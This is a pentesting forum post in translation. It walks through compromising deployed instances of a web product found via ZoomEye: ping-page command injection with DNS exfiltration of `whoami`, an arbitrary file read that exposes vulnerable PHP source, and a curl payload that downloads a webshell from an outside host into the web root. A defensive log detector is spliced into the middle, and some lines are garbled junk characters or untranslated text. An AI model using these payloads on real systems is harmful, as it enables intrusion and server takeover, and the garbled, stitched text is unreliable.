中国网络渗透测试联盟 (China Cyber Penetration Testing Alliance)

Author: admin    Time: 2022-3-31 01:39
Title: Web security in practice: getting a webshell through an OS command injection vulnerability
**1. Finding the entry point**

**Right-clicking to view the page source showed that the system's distinctive feature is images/select_bg.png. Searching for it on ZoomEye (钟馗之眼) gave the result shown below:**

![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Both reporter and [Technology, Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all) use this feature. I had worked on this kind of system before and had its source code, so by comparing against the source tree I found an unauthenticated page.**

**The address is:**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**, as shown:**

![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Testing the ping function here, I found that commands could be executed by breaking out of ping's normal functionality. The payload was:**

**`whoami`.1111.ceye.io**, as shown:

![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The DNS records that came back, as shown:**

![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The current user turned out to be root.**

**2. Chaining vulnerabilities to get a webshell**

**This writeup follows the order in which the bugs were found. Next, I ran pwd to get the web path, as shown:**

![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

4 k9 V- Y. S" A4 I# O" B
4 k5 T$ Y" k- N" {9 f! p
7 u$ }; h( Y7 h$ d: }( @* ]5 x**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**6 [" f3 g$ b2 }9 F9 x

7 L( s+ D6 i. a6 b/ }# x9 m**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**
4 K+ ~# G3 x: e2 w! s0 ~3 l( B7 e8 y% S
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The OS command injection is in /var/www/html/view/Behavior/toQuery.php. This path was obtained in the first step, through the bug that breaks out of the ping command's normal functionality to execute commands. Using the arbitrary file read, let's read its source code:**

![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The source code is:**

```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"] . "/model/charFilter.php");
?>

<?php
session_start();

if ($_GET["objClass"] == "")
    exit();

// Every request parameter is forwarded to the backend query script.
$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET["method"] == "getList" || $_GET["method"] == "import" || $_GET["method"] == "processAlarm") {
    $param["user"] = $_SESSION["s_userName"];
    $param["lan"] = $_SESSION["lan"];
    $param["regUserpath"] = $_SESSION["regUserpath"];

    exec("rm -rf /tmp/cache");

    // The command line is built by string concatenation: objClass and method
    // come straight from the query string with no validation or escaping.
    $cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
    $cmd .= " " . $_GET["objClass"];
    $cmd .= " " . $_GET["method"];
    $cmd .= " " . base64_encode(json_encode($param));

    file_put_contents("/tmp/query_cmd", $cmd);

    // Output is discarded and the process is backgrounded, so nothing comes back to the caller.
    exec($cmd . " > /dev/null &");
} else {
    require_once($_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
    $obj = new QueryInterface();
    $instance = $obj->getInstance();
    $instance->invokeMethod($_GET["objClass"], $_GET["method"], $param);
}

exit();
?>
```

**A quick audit shows `if ($_GET["method"] == "getList" || $_GET["method"] == "import" || $_GET["method"] == "processAlarm")`: as long as method equals one of getList, import or processAlarm, we get `$cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";`, i.e. cmd is the site's absolute path plus system/behavior/behavior_query.php, followed by `file_put_contents("/tmp/query_cmd", $cmd);`**

**and `exec($cmd . " > /dev/null &");`. Because objClass and method are appended to $cmd without validation or escaping, this hands us an injectable parameter and directly results in an OS command injection vulnerability. My demonstration follows:**

![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**In the figure, the objClass= parameter has the OS command injection. I first tried a bash reverse shell, but after a whole night of testing it never connected back, so in the end I used curl to download the webshell. The payload was:**

```text
%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php
```

**URL-decoded, it reads:**

```text
|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php
```

**All those pipe characters | are there to close out the surrounding command so the payload runs. In the end curl successfully downloaded the webshell, as shown:**

![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
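From the defender's side, both steps of this chain leave a recognisable shape in the web server's access log. The detector below is an added example for this post (not the author's or the vendor's code): it flags shell metacharacters in any parameter of the ping page under /view/systemConfig/, and a toQuery.php objClass or method that is not a bare identifier, rating the latter higher when method is one of the three values that reach exec(). The log lines are constructed samples; the ping script name ping.php and its parameter text_ip are assumptions, since the post only shows text_packetsize=64.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that let a value break out of a command string built by
# concatenation, which is how toQuery.php appends objClass and method.
SHELL_META = re.compile(r"[|;&`$()<>#'\"\\\n]")
# A PHP class or method name is all toQuery.php should ever accept here.
SAFE_TOKEN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# toQuery.php only shells out to behavior_query.php for these three methods.
SHELL_METHODS = {"getList", "import", "processAlarm"}
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

def inspect_target(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if path.endswith("/view/behavior/toquery.php"):
        # A method in SHELL_METHODS means the value reaches exec(), so rate it higher.
        sev = "HIGH" if set(params.get("method", [])) & SHELL_METHODS else "MEDIUM"
        for name in ("objClass", "method"):
            for value in params.get(name, []):
                if not SAFE_TOKEN.match(value):
                    findings.append(f"{sev}: toQuery.php {name} is not a bare identifier: {value[:60]!r}")
    elif "/view/systemconfig/" in path:
        # The ping tool lives under systemConfig and hands its input to ping.
        for name, values in params.items():
            for value in values:
                if SHELL_META.search(value):
                    findings.append(f"HIGH: ping page parameter {name} has shell metacharacters: {value[:60]!r}")
    return findings

def scan_log(lines):
    """Return (line_no, finding) pairs for every suspicious request in an access log."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            hits.extend((n, f) for f in inspect_target(m.group("target")))
    return hits

# Constructed sample log lines (not from the post's target); ping.php and text_ip are assumed
# names. Line 2 has the ping breakout shape, line 3 the objClass injection shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/Mar/2022:01:30:00 +0800] "GET /view/Behavior/toQuery.php?objClass=Report&method=getList HTTP/1.1" 200 12',
    '10.0.0.5 - - [31/Mar/2022:01:35:00 +0800] "GET /view/systemConfig/systemtool/ping.php?text_ip=%60whoami%60.1111.ceye.io&text_packetsize=64 HTTP/1.1" 200 88',
    '10.0.0.5 - - [31/Mar/2022:01:38:00 +0800] "GET /view/Behavior/toQuery.php?objClass=%7Ccurl%20http%3A%2F%2F1.1.1.1%2Fx.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fs.php&method=getList HTTP/1.1" 200 0',
]
```

Run `scan_log(SAMPLE_LOG)` on the samples: line 1 is a clean request and produces nothing, lines 2 and 3 each produce one HIGH finding.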

**3. Summary**

**That this case ended in a webshell depends largely on combining several vulnerabilities. First, viewing the page source identified which system the target runs, since I had tested a similar program before. Then, targeting that system, I found the unauthenticated ping page and, by breaking out of ping's normal functionality, ran pwd to obtain the site's absolute path. Next, I used the arbitrary file read to fetch the PHP file suspected of OS command execution and audited it briefly, confirming the vulnerability. Finally, I built the OS command execution payload and got the webshell. The whole process is a chain of vulnerabilities; penetration testing often comes down to luck, and if any one of these links had been missing or had gone unfound, getting the webshell could have failed.**

**In short, luck and bug-hunting skill matter equally. Thanks for reading!**